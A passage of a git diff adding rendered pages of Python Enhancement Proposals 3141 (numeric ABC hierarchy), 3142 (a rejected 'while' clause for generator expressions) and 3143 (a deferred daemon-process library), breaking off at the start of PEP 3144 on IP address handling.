+ + + + + \ No newline at end of file diff --git a/pep-3141/index.html b/pep-3141/index.html new file mode 100644 index 00000000000..efcd852d20c --- /dev/null +++ b/pep-3141/index.html @@ -0,0 +1,667 @@ + + + + + + + + PEP 3141 – A Type Hierarchy for Numbers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3141 – A Type Hierarchy for Numbers

+
+
Author:
+
Jeffrey Yasskin <jyasskin at google.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
25-Apr-2007, 16-May-2007, 02-Aug-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This proposal defines a hierarchy of Abstract Base Classes (ABCs) (PEP +3119) to represent number-like classes. It proposes a hierarchy of +Number :> Complex :> Real :> Rational :> Integral where A :> B +means “A is a supertype of B”. The hierarchy is inspired by Scheme’s +numeric tower [3].

+
+
+

Rationale

+

Functions that take numbers as arguments should be able to determine +the properties of those numbers, and if and when overloading based on +types is added to the language, should be overloadable based on the +types of the arguments. For example, slicing requires its arguments to +be Integrals, and the functions in the math module require +their arguments to be Real.

+
+
+

Specification

+

This PEP specifies a set of Abstract Base Classes, and suggests a +general strategy for implementing some of the methods. It uses +terminology from PEP 3119, but the hierarchy is intended to be +meaningful for any systematic method of defining sets of classes.

+

The type checks in the standard library should use these classes +instead of the concrete built-ins.

+
+

Numeric Classes

+

We begin with a Number class to make it easy for people to be fuzzy +about what kind of number they expect. This class only helps with +overloading; it doesn’t provide any operations.

+
class Number(metaclass=ABCMeta): pass
+
+
+

Most implementations of complex numbers will be hashable, but if you +need to rely on that, you’ll have to check it explicitly: mutable +numbers are supported by this hierarchy.

+
class Complex(Number):
+    """Complex defines the operations that work on the builtin complex type.
+
+    In short, those are: conversion to complex, bool(), .real, .imag,
+    +, -, *, /, **, abs(), .conjugate(), ==, and !=.
+
+    If it is given heterogeneous arguments, and doesn't have special
+    knowledge about them, it should fall back to the builtin complex
+    type as described below.
+    """
+
+    @abstractmethod
+    def __complex__(self):
+        """Return a builtin complex instance."""
+
+    def __bool__(self):
+        """True if self != 0."""
+        return self != 0
+
+    @abstractproperty
+    def real(self):
+        """Retrieve the real component of this number.
+
+        This should subclass Real.
+        """
+        raise NotImplementedError
+
+    @abstractproperty
+    def imag(self):
+        """Retrieve the imaginary component of this number.
+
+        This should subclass Real.
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __add__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __radd__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __neg__(self):
+        raise NotImplementedError
+
+    def __pos__(self):
+        """Coerces self to whatever class defines the method."""
+        raise NotImplementedError
+
+    def __sub__(self, other):
+        return self + -other
+
+    def __rsub__(self, other):
+        return -self + other
+
+    @abstractmethod
+    def __mul__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rmul__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __div__(self, other):
+        """a/b; should promote to float or complex when necessary."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rdiv__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __pow__(self, exponent):
+        """a**b; should promote to float or complex when necessary."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rpow__(self, base):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __abs__(self):
+        """Returns the Real distance from 0."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def conjugate(self):
+        """(x+y*i).conjugate() returns (x-y*i)."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __eq__(self, other):
+        raise NotImplementedError
+
+    # __ne__ is inherited from object and negates whatever __eq__ does.
+
+
+

The Real ABC indicates that the value is on the real line, and +supports the operations of the float builtin. Real numbers are +totally ordered except for NaNs (which this PEP basically ignores).

+
class Real(Complex):
+    """To Complex, Real adds the operations that work on real numbers.
+
+    In short, those are: conversion to float, trunc(), math.floor(),
+    math.ceil(), round(), divmod(), //, %, <, <=, >, and >=.
+
+    Real also provides defaults for some of the derived operations.
+    """
+
+    # XXX What to do about the __int__ implementation that's
+    # currently present on float?  Get rid of it?
+
+    @abstractmethod
+    def __float__(self):
+        """Any Real can be converted to a native float object."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __trunc__(self):
+        """Truncates self to an Integral.
+
+        Returns an Integral i such that:
+          * i>=0 iff self>0;
+          * abs(i) <= abs(self);
+          * for any Integral j satisfying the first two conditions,
+            abs(i) >= abs(j) [i.e. i has "maximal" abs among those].
+        i.e. "truncate towards 0".
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __floor__(self):
+        """Finds the greatest Integral <= self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __ceil__(self):
+        """Finds the least Integral >= self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __round__(self, ndigits:Integral=None):
+        """Rounds self to ndigits decimal places, defaulting to 0.
+
+        If ndigits is omitted or None, returns an Integral,
+        otherwise returns a Real, preferably of the same type as
+        self. Types may choose which direction to round half. For
+        example, float rounds half toward even.
+
+        """
+        raise NotImplementedError
+
+    def __divmod__(self, other):
+        """The pair (self // other, self % other).
+
+        Sometimes this can be computed faster than the pair of
+        operations.
+        """
+        return (self // other, self % other)
+
+    def __rdivmod__(self, other):
+        """The pair (self // other, self % other).
+
+        Sometimes this can be computed faster than the pair of
+        operations.
+        """
+        return (other // self, other % self)
+
+    @abstractmethod
+    def __floordiv__(self, other):
+        """The floor() of self/other. Integral."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rfloordiv__(self, other):
+        """The floor() of other/self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __mod__(self, other):
+        """self % other
+
+        See
+        https://mail.python.org/pipermail/python-3000/2006-May/001735.html
+        and consider using "self/other - trunc(self/other)"
+        instead if you're worried about round-off errors.
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rmod__(self, other):
+        """other % self"""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __lt__(self, other):
+        """< on Reals defines a total ordering, except perhaps for NaN."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __le__(self, other):
+        raise NotImplementedError
+
+    # __gt__ and __ge__ are automatically done by reversing the arguments.
+    # (But __le__ is not computed as the opposite of __gt__!)
+
+    # Concrete implementations of Complex abstract methods.
+    # Subclasses may override these, but don't have to.
+
+    def __complex__(self):
+        return complex(float(self))
+
+    @property
+    def real(self):
+        return +self
+
+    @property
+    def imag(self):
+        return 0
+
+    def conjugate(self):
+        """Conjugate is a no-op for Reals."""
+        return +self
+
+
+

We should clean up Demo/classes/Rat.py and promote it into +rational.py in the standard library. Then it will implement the +Rational ABC.

+
class Rational(Real, Exact):
+    """.numerator and .denominator should be in lowest terms."""
+
+    @abstractproperty
+    def numerator(self):
+        raise NotImplementedError
+
+    @abstractproperty
+    def denominator(self):
+        raise NotImplementedError
+
+    # Concrete implementation of Real's conversion to float.
+    # (This invokes Integer.__div__().)
+
+    def __float__(self):
+        return self.numerator / self.denominator
+
+
+

And finally integers:

+
class Integral(Rational):
+    """Integral adds a conversion to int and the bit-string operations."""
+
+    @abstractmethod
+    def __int__(self):
+        raise NotImplementedError
+
+    def __index__(self):
+        """__index__() exists because float has __int__()."""
+        return int(self)
+
+    def __lshift__(self, other):
+        return int(self) << int(other)
+
+    def __rlshift__(self, other):
+        return int(other) << int(self)
+
+    def __rshift__(self, other):
+        return int(self) >> int(other)
+
+    def __rrshift__(self, other):
+        return int(other) >> int(self)
+
+    def __and__(self, other):
+        return int(self) & int(other)
+
+    def __rand__(self, other):
+        return int(other) & int(self)
+
+    def __xor__(self, other):
+        return int(self) ^ int(other)
+
+    def __rxor__(self, other):
+        return int(other) ^ int(self)
+
+    def __or__(self, other):
+        return int(self) | int(other)
+
+    def __ror__(self, other):
+        return int(other) | int(self)
+
+    def __invert__(self):
+        return ~int(self)
+
+    # Concrete implementations of Rational and Real abstract methods.
+    def __float__(self):
+        """float(self) == float(int(self))"""
+        return float(int(self))
+
+    @property
+    def numerator(self):
+        """Integers are their own numerators."""
+        return +self
+
+    @property
+    def denominator(self):
+        """Integers have a denominator of 1."""
+        return 1
+
+
+
+
+

Changes to operations and __magic__ methods

+

To support more precise narrowing from float to int (and more +generally, from Real to Integral), we propose the following new +__magic__ methods, to be called from the corresponding library +functions. All of these return Integrals rather than Reals.

+
    +
  1. __trunc__(self), called from a new builtin trunc(x), which +returns the Integral closest to x between 0 and x.
  2. +
  3. __floor__(self), called from math.floor(x), which returns +the greatest Integral <= x.
  4. +
  5. __ceil__(self), called from math.ceil(x), which returns the +least Integral >= x.
  6. +
  7. __round__(self), called from round(x), which returns the +Integral closest to x, rounding half as the type chooses. +float will change in 3.0 to round half toward even. There is +also a 2-argument version, __round__(self, ndigits), called +from round(x, ndigits), which should return a Real.
  8. +
+

In 2.6, math.floor, math.ceil, and round will continue to +return floats.

+

The int() conversion implemented by float is equivalent to +trunc(). In general, the int() conversion should try +__int__() first and if it is not found, try __trunc__().

+

complex.__{divmod,mod,floordiv,int,float}__ also go away. It would +be nice to provide a nice error message to help confused porters, but +not appearing in help(complex) is more important.

+
+
+

Notes for type implementors

+

Implementors should be careful to make equal numbers equal and +hash them to the same values. This may be subtle if there are two +different extensions of the real numbers. For example, a complex type +could reasonably implement hash() as follows:

+
def __hash__(self):
+    return hash(complex(self))
+
+
+

but should be careful of any values that fall outside of the built in +complex’s range or precision.

+
+

Adding More Numeric ABCs

+

There are, of course, more possible ABCs for numbers, and this would +be a poor hierarchy if it precluded the possibility of adding +those. You can add MyFoo between Complex and Real with:

+
class MyFoo(Complex): ...
+MyFoo.register(Real)
+
+
+
+
+

Implementing the arithmetic operations

+

We want to implement the arithmetic operations so that mixed-mode +operations either call an implementation whose author knew about the +types of both arguments, or convert both to the nearest built in type +and do the operation there. For subtypes of Integral, this means that +__add__ and __radd__ should be defined as:

+
class MyIntegral(Integral):
+
+    def __add__(self, other):
+        if isinstance(other, MyIntegral):
+            return do_my_adding_stuff(self, other)
+        elif isinstance(other, OtherTypeIKnowAbout):
+            return do_my_other_adding_stuff(self, other)
+        else:
+            return NotImplemented
+
+    def __radd__(self, other):
+        if isinstance(other, MyIntegral):
+            return do_my_adding_stuff(other, self)
+        elif isinstance(other, OtherTypeIKnowAbout):
+            return do_my_other_adding_stuff(other, self)
+        elif isinstance(other, Integral):
+            return int(other) + int(self)
+        elif isinstance(other, Real):
+            return float(other) + float(self)
+        elif isinstance(other, Complex):
+            return complex(other) + complex(self)
+        else:
+            return NotImplemented
+
+
+

There are 5 different cases for a mixed-type operation on subclasses +of Complex. I’ll refer to all of the above code that doesn’t refer to +MyIntegral and OtherTypeIKnowAbout as “boilerplate”. a will be an +instance of A, which is a subtype of Complex (a : A <: +Complex), and b : B <: Complex. I’ll consider a + b:

+
    +
  1. If A defines an __add__ which accepts b, all is well.
  2. +
  3. If A falls back to the boilerplate code, and it were to return +a value from __add__, we’d miss the possibility that B defines +a more intelligent __radd__, so the boilerplate should return +NotImplemented from __add__. (Or A may not implement __add__ at +all.)
  4. +
  5. Then B’s __radd__ gets a chance. If it accepts a, all is well.
  6. +
  7. If it falls back to the boilerplate, there are no more possible +methods to try, so this is where the default implementation +should live.
  8. +
  9. If B <: A, Python tries B.__radd__ before A.__add__. This is +ok, because it was implemented with knowledge of A, so it can +handle those instances before delegating to Complex.
  10. +
+

If A<:Complex and B<:Real without sharing any other knowledge, +then the appropriate shared operation is the one involving the built +in complex, and both __radd__s land there, so a+b == b+a.

+
+
+
+
+

Rejected Alternatives

+

The initial version of this PEP defined an algebraic hierarchy +inspired by a Haskell Numeric Prelude [2] including +MonoidUnderPlus, AdditiveGroup, Ring, and Field, and mentioned several +other possible algebraic types before getting to the numbers. We had +expected this to be useful to people using vectors and matrices, but +the NumPy community really wasn’t interested, and we ran into the +issue that even if x is an instance of X <: MonoidUnderPlus +and y is an instance of Y <: MonoidUnderPlus, x + y may +still not make sense.

+

Then we gave the numbers a much more branching structure to include +things like the Gaussian Integers and Z/nZ, which could be Complex but +wouldn’t necessarily support things like division. The community +decided that this was too much complication for Python, so I’ve now +scaled back the proposal to resemble the Scheme numeric tower much +more closely.

+
+
+

The Decimal Type

+

After consultation with its authors it has been decided that the +Decimal type should not at this time be made part of the numeric +tower.

+
+
+

References

+ +
+
+

Acknowledgements

+

Thanks to Neal Norwitz for encouraging me to write this PEP in the +first place, to Travis Oliphant for pointing out that the numpy people +didn’t really care about the algebraic concepts, to Alan Isaac for +reminding me that Scheme had already done this, and to Guido van +Rossum and lots of other people on the mailing list for refining the +concept.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3141.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3142/index.html b/pep-3142/index.html new file mode 100644 index 00000000000..f398e622367 --- /dev/null +++ b/pep-3142/index.html @@ -0,0 +1,222 @@ + + + + + + + + PEP 3142 – Add a “while” clause to generator expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3142 – Add a “while” clause to generator expressions

+
+
Author:
+
Gerald Britton <gerald.britton at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Jan-2009
+
Python-Version:
+
3.0
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an enhancement to generator expressions, adding a +“while” clause to complement the existing “if” clause.

+
+
+

Rationale

+

A generator expression (PEP 289) is a concise method to serve +dynamically-generated objects to list comprehensions (PEP 202). +Current generator expressions allow for an “if” clause to filter +the objects that are returned to those meeting some set of +criteria. However, since the “if” clause is evaluated for every +object that may be returned, in some cases it is possible that all +objects would be rejected after a certain point. For example:

+
g = (n for n in range(100) if n*n < 50)
+
+
+

which is equivalent to the using a generator function +(PEP 255):

+
def __gen(exp):
+    for n in exp:
+        if n*n < 50:
+            yield n
+g = __gen(iter(range(10)))
+
+
+

would yield 0, 1, 2, 3, 4, 5, 6 and 7, but would also consider +the numbers from 8 to 99 and reject them all since n*n >= 50 for +numbers in that range. Allowing for a “while” clause would allow +the redundant tests to be short-circuited:

+
g = (n for n in range(100) while n*n < 50)
+
+
+

would also yield 0, 1, 2, 3, 4, 5, 6 and 7, but would stop at 8 +since the condition (n*n < 50) is no longer true. This would be +equivalent to the generator function:

+
def __gen(exp):
+    for n in exp:
+        if n*n < 50:
+            yield n
+        else:
+            break
+g = __gen(iter(range(100)))
+
+
+

Currently, in order to achieve the same result, one would need to +either write a generator function such as the one above or use the +takewhile function from itertools:

+
from itertools import takewhile
+g = takewhile(lambda n: n*n < 50, range(100))
+
+
+

The takewhile code achieves the same result as the proposed syntax, +albeit in a longer (some would say “less-elegant”) fashion. Also, +the takewhile version requires an extra function call (the lambda +in the example above) with the associated performance penalty. +A simple test shows that:

+
for n in (n for n in range(100) if 1): pass
+
+
+

performs about 10% better than:

+
for n in takewhile(lambda n: 1, range(100)): pass
+
+
+

though they achieve similar results. (The first example uses a +generator; takewhile is an iterator). If similarly implemented, +a “while” clause should perform about the same as the “if” clause +does today.

+

The reader may ask if the “if” and “while” clauses should be +mutually exclusive. There are good examples that show that there +are times when both may be used to good advantage. For example:

+
p = (p for p in primes() if p > 100 while p < 1000)
+
+
+

should return prime numbers found between 100 and 1000, assuming +I have a primes() generator that yields prime numbers.

+

Adding a “while” clause to generator expressions maintains the +compact form while adding a useful facility for short-circuiting +the expression.

+
+
+

Acknowledgements

+

Raymond Hettinger first proposed the concept of generator +expressions in January 2002.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3142.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3143/index.html b/pep-3143/index.html new file mode 100644 index 00000000000..80b358d4451 --- /dev/null +++ b/pep-3143/index.html @@ -0,0 +1,678 @@ + + + + + + + + PEP 3143 – Standard daemon process library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3143 – Standard daemon process library

+
+
Author:
+
Ben Finney <ben+python at benfinney.id.au>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
26-Jan-2009
+
Python-Version:
+
3.x
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Writing a program to become a well-behaved Unix daemon is somewhat +complex and tricky to get right, yet the steps are largely similar for +any daemon regardless of what else the program may need to do.

+

This PEP introduces a package to the Python standard library that +provides a simple interface to the task of becoming a daemon process.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Specification

+
+

Example usage

+

Simple example of direct DaemonContext usage:

+
import daemon
+
+from spam import do_main_program
+
+with daemon.DaemonContext():
+    do_main_program()
+
+
+

More complex example usage:

+
import os
+import grp
+import signal
+import daemon
+import lockfile
+
+from spam import (
+    initial_program_setup,
+    do_main_program,
+    program_cleanup,
+    reload_program_config,
+    )
+
+context = daemon.DaemonContext(
+    working_directory='/var/lib/foo',
+    umask=0o002,
+    pidfile=lockfile.FileLock('/var/run/spam.pid'),
+    )
+
+context.signal_map = {
+    signal.SIGTERM: program_cleanup,
+    signal.SIGHUP: 'terminate',
+    signal.SIGUSR1: reload_program_config,
+    }
+
+mail_gid = grp.getgrnam('mail').gr_gid
+context.gid = mail_gid
+
+important_file = open('spam.data', 'w')
+interesting_file = open('eggs.data', 'w')
+context.files_preserve = [important_file, interesting_file]
+
+initial_program_setup()
+
+with context:
+    do_main_program()
+
+
+
+
+

Interface

+

A new package, daemon, is added to the standard library.

+

A class, DaemonContext, is defined to represent the settings and +process context for the program running as a daemon process.

+
+
+

DaemonContext objects

+

A DaemonContext instance represents the behaviour settings and +process context for the program when it becomes a daemon. The +behaviour and environment is customised by setting options on the +instance, before calling the open method.

+

Each option can be passed as a keyword argument to the DaemonContext +constructor, or subsequently altered by assigning to an attribute on +the instance at any time prior to calling open. That is, for +options named wibble and wubble, the following invocation:

+
foo = daemon.DaemonContext(wibble=bar, wubble=baz)
+foo.open()
+
+
+

is equivalent to:

+
foo = daemon.DaemonContext()
+foo.wibble = bar
+foo.wubble = baz
+foo.open()
+
+
+

The following options are defined.

+
+
files_preserve
+
Default:
+
None
+
+

List of files that should not be closed when starting the +daemon. If None, all open file descriptors will be closed.

+

Elements of the list are file descriptors (as returned by a file +object’s fileno() method) or Python file objects. Each +specifies a file that is not to be closed during daemon start.

+
+
chroot_directory
+
Default:
+
None
+
+

Full path to a directory to set as the effective root directory of +the process. If None, specifies that the root directory is not +to be changed.

+
+
working_directory
+
Default:
+
'/'
+
+

Full path of the working directory to which the process should +change on daemon start.

+

Since a filesystem cannot be unmounted if a process has its +current working directory on that filesystem, this should either +be left at default or set to a directory that is a sensible “home +directory” for the daemon while it is running.

+
+
umask
+
Default:
+
0
+
+

File access creation mask (“umask”) to set for the process on +daemon start.

+

Since a process inherits its umask from its parent process, +starting the daemon will reset the umask to this value so that +files are created by the daemon with access modes as it expects.

+
+
pidfile
+
Default:
+
None
+
+

Context manager for a PID lock file. When the daemon context opens +and closes, it enters and exits the pidfile context manager.

+
+
detach_process
+
Default:
+
None
+
+

If True, detach the process context when opening the daemon +context; if False, do not detach.

+

If unspecified (None) during initialisation of the instance, +this will be set to True by default, and False only if +detaching the process is determined to be redundant; for example, +in the case when the process was started by init, by initd, or +by inetd.

+
+
signal_map
+
Default:
+
system-dependent
+
+

Mapping from operating system signals to callback actions.

+

The mapping is used when the daemon context opens, and determines +the action for each signal’s signal handler:

+
    +
  • A value of None will ignore the signal (by setting the +signal action to signal.SIG_IGN).
  • +
  • A string value will be used as the name of an attribute on the +DaemonContext instance. The attribute’s value will be used +as the action for the signal handler.
  • +
  • Any other value will be used as the action for the signal +handler.
  • +
+

The default value depends on which signals are defined on the +running system. Each item from the list below whose signal is +actually defined in the signal module will appear in the +default map:

+
    +
  • signal.SIGTTIN: None
  • +
  • signal.SIGTTOU: None
  • +
  • signal.SIGTSTP: None
  • +
  • signal.SIGTERM: 'terminate'
  • +
+

Depending on how the program will interact with its child +processes, it may need to specify a signal map that includes the +signal.SIGCHLD signal (received when a child process exits). +See the specific operating system’s documentation for more detail +on how to determine what circumstances dictate the need for signal +handlers.

+
+
uid
+
Default:
+
os.getuid()
+
+
+
gid
+
Default:
+
os.getgid()
+
+

The user ID (“UID”) value and group ID (“GID”) value to switch +the process to on daemon start.

+

The default values, the real UID and GID of the process, will +relinquish any effective privilege elevation inherited by the +process.

+
+
prevent_core
+
Default:
+
True
+
+

If true, prevents the generation of core files, in order to avoid +leaking sensitive information from daemons run as root.

+
+
stdin
+
Default:
+
None
+
+
+
stdout
+
Default:
+
None
+
+
+
stderr
+
Default:
+
None
+
+

Each of stdin, stdout, and stderr is a file-like object +which will be used as the new file for the standard I/O stream +sys.stdin, sys.stdout, and sys.stderr respectively. The file +should therefore be open, with a minimum of mode ‘r’ in the case +of stdin, and mode ‘w+’ in the case of stdout and stderr.

+

If the object has a fileno() method that returns a file +descriptor, the corresponding file will be excluded from being +closed during daemon start (that is, it will be treated as though +it were listed in files_preserve).

+

If None, the corresponding system stream is re-bound to the +file named by os.devnull.

+
+
+

The following methods are defined.

+
+
open()
+
Return:
+
None
+
+

Open the daemon context, turning the current program into a daemon +process. This performs the following steps:

+
    +
  • If this instance’s is_open property is true, return +immediately. This makes it safe to call open multiple times on +an instance.
  • +
  • If the prevent_core attribute is true, set the resource limits +for the process to prevent any core dump from the process.
  • +
  • If the chroot_directory attribute is not None, set the +effective root directory of the process to that directory (via +os.chroot).

    This allows running the daemon process inside a “chroot gaol” +as a means of limiting the system’s exposure to rogue behaviour +by the process. Note that the specified directory needs to +already be set up for this purpose.

    +
  • +
  • Set the process UID and GID to the uid and gid attribute +values.
  • +
  • Close all open file descriptors. This excludes those listed in +the files_preserve attribute, and those that correspond to the +stdin, stdout, or stderr attributes.
  • +
  • Change current working directory to the path specified by the +working_directory attribute.
  • +
  • Reset the file access creation mask to the value specified by +the umask attribute.
  • +
  • If the detach_process option is true, detach the current +process into its own process group, and disassociate from any +controlling terminal.
  • +
  • Set signal handlers as specified by the signal_map attribute.
  • +
  • If any of the attributes stdin, stdout, stderr are not +None, bind the system streams sys.stdin, sys.stdout, +and/or sys.stderr to the files represented by the +corresponding attributes. Where the attribute has a file +descriptor, the descriptor is duplicated (instead of re-binding +the name).
  • +
  • If the pidfile attribute is not None, enter its context +manager.
  • +
  • Mark this instance as open (for the purpose of future open and +close calls).
  • +
  • Register the close method to be called during Python’s exit +processing.
  • +
+

When the function returns, the running program is a daemon +process.

+
+
close()
+
Return:
+
None
+
+

Close the daemon context. This performs the following steps:

+
    +
  • If this instance’s is_open property is false, return +immediately. This makes it safe to call close multiple times +on an instance.
  • +
  • If the pidfile attribute is not None, exit its context +manager.
  • +
  • Mark this instance as closed (for the purpose of future open +and close calls).
  • +
+
+
is_open
+
Return:
+
True if the instance is open, False otherwise.
+
+

This property exposes the state indicating whether the instance is +currently open. It is True if the instance’s open method has +been called and the close method has not subsequently been +called.

+
+
terminate(signal_number, stack_frame)
+
Return:
+
None
+
+

Signal handler for the signal.SIGTERM signal. Performs the +following step:

+
    +
  • Raise a SystemExit exception explaining the signal.
  • +
+
+
+

The class also implements the context manager protocol via +__enter__ and __exit__ methods.

+
+
__enter__()
+
Return:
+
The DaemonContext instance
+
+

Call the instance’s open() method, then return the instance.

+
+
__exit__(exc_type, exc_value, exc_traceback)
+
Return:
+
True or False as defined by the context manager +protocol
+
+

Call the instance’s close() method, then return True if the +exception was handled or False if it was not.

+
+
+
+
+
+

Motivation

+

The majority of programs written to be Unix daemons either implement +behaviour very similar to that in the specification, or are +poorly-behaved daemons by the correct daemon behaviour.

+

Since these steps should be much the same in most implementations but +are very particular and easy to omit or implement incorrectly, they +are a prime target for a standard well-tested implementation in the +standard library.

+
+
+

Rationale

+
+

Correct daemon behaviour

+

According to Stevens in [stevens] §2.6, a program should perform the +following steps to become a Unix daemon process.

+
    +
  • Close all open file descriptors.
  • +
  • Change current working directory.
  • +
  • Reset the file access creation mask.
  • +
  • Run in the background.
  • +
  • Disassociate from process group.
  • +
  • Ignore terminal I/O signals.
  • +
  • Disassociate from control terminal.
  • +
  • Don’t reacquire a control terminal.
  • +
  • Correctly handle the following circumstances:
      +
    • Started by System V init process.
    • +
    • Daemon termination by SIGTERM signal.
    • +
    • Children generate SIGCLD signal.
    • +
    +
  • +
+

The daemon tool [slack-daemon] lists (in its summary of features) +behaviour that should be performed when turning a program into a +well-behaved Unix daemon process. It differs from this PEP’s intent in +that it invokes a separate program as a daemon process. The +following features are appropriate for a daemon that starts itself +once the program is already running:

+
    +
  • Sets up the correct process context for a daemon.
  • +
  • Behaves sensibly when started by initd(8) or inetd(8).
  • +
  • Revokes any suid or sgid privileges to reduce security risks in case +daemon is incorrectly installed with special privileges.
  • +
  • Prevents the generation of core files to prevent leaking sensitive +information from daemons run as root (optional).
  • +
  • Names the daemon by creating and locking a PID file to guarantee +that only one daemon with the given name can execute at any given +time (optional).
  • +
  • Sets the user and group under which to run the daemon (optional, +root only).
  • +
  • Creates a chroot gaol (optional, root only).
  • +
  • Captures the daemon’s stdout and stderr and directs them to syslog +(optional).
  • +
+
+
+

A daemon is not a service

+

This PEP addresses only Unix-style daemons, for which the above +correct behaviour is relevant, as opposed to comparable behaviours on +other operating systems.

+

There is a related concept in many systems, called a “service”. A +service differs from the model in this PEP, in that rather than having +the current program continue to run as a daemon process, a service +starts an additional process to run in the background, and the +current process communicates with that additional process via some +defined channels.

+

The Unix-style daemon model in this PEP can be used, among other +things, to implement the background-process part of a service; but +this PEP does not address the other aspects of setting up and managing +a service.

+
+
+
+

Reference Implementation

+

The python-daemon package [python-daemon].

+
+

Other daemon implementations

+

Prior to this PEP, several existing third-party Python libraries or +tools implemented some of this PEP’s correct daemon behaviour.

+

The reference implementation is a fairly direct successor from the +following implementations:

+ +

Other Python daemon implementations that differ from this PEP:

+
    +
  • The zdaemon tool [zdaemon] was written for the Zope project. Like +[slack-daemon], it differs from this specification because it is +used to run another program as a daemon process.
  • +
  • The Python library daemon [clapper-daemon] is (according to its +homepage) no longer maintained. As of version 1.0.1, it implements +the basic steps from [stevens].
  • +
  • The daemonize library [seutter-daemonize] also implements the +basic steps from [stevens].
  • +
  • Ray Burr’s daemon.py module [burr-daemon] provides the [stevens] +procedure as well as PID file handling and redirection of output to +syslog.
  • +
  • Twisted [twisted] includes, perhaps unsurprisingly, an +implementation of a process daemonisation API that is integrated +with the rest of the Twisted framework; it differs significantly +from the API in this PEP.
  • +
  • The Python initd library [dagitses-initd], which uses +[clapper-daemon], implements an equivalent of Unix initd(8) for +controlling a daemon process.
  • +
+
+
+
+

References

+
+
+
[stevens] (1, 2, 3, 4)
+
Unix Network Programming, W. Richard Stevens, 1994 Prentice +Hall.
+
+
[slack-daemon] (1, 2)
+
The (non-Python) “libslack” implementation of a daemon tool +http://www.libslack.org/daemon/ by “raf” <raf@raf.org>.
+
+
[python-daemon] (1, 2)
+
The python-daemon library +http://pypi.python.org/pypi/python-daemon/ by Ben Finney et +al.
+
+
[cookbook-66012] (1, 2)
+
Python Cookbook recipe 66012, “Fork a daemon process on Unix” +http://code.activestate.com/recipes/66012/.
+
+
[cookbook-278731]
+
Python Cookbook recipe 278731, “Creating a daemon the Python way” +http://code.activestate.com/recipes/278731/.
+
+
[bda.daemon]
+
The bda.daemon library +http://pypi.python.org/pypi/bda.daemon/ by Robert +Niederreiter et al.
+
+
[zdaemon]
+
The zdaemon tool http://pypi.python.org/pypi/zdaemon/ by +Guido van Rossum et al.
+
+
[clapper-daemon] (1, 2)
+
The daemon library http://pypi.python.org/pypi/daemon/ by +Brian Clapper.
+
+
[seutter-daemonize]
+
The daemonize library http://daemonize.sourceforge.net/ by +Jerry Seutter.
+
+
[burr-daemon]
+
The daemon.py module +http://www.nightmare.com/~ryb/code/daemon.py by Ray Burr.
+
+
[twisted]
+
The Twisted application framework +http://pypi.python.org/pypi/Twisted/ by Glyph Lefkowitz et +al.
+
+
[dagitses-initd]
+
The Python initd library http://pypi.python.org/pypi/initd/ +by Michael Andreas Dagitses.
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3143.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3144/index.html b/pep-3144/index.html new file mode 100644 index 00000000000..19073bd7cd0 --- /dev/null +++ b/pep-3144/index.html @@ -0,0 +1,291 @@ + + + + + + + + PEP 3144 – IP Address Manipulation Library for the Python Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3144 – IP Address Manipulation Library for the Python Standard Library

+
+
Author:
+
Peter Moody <pmoody at google.com>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
ipaddr-py-dev@googlegroups.com
+
Status:
+
Final
+
Type:
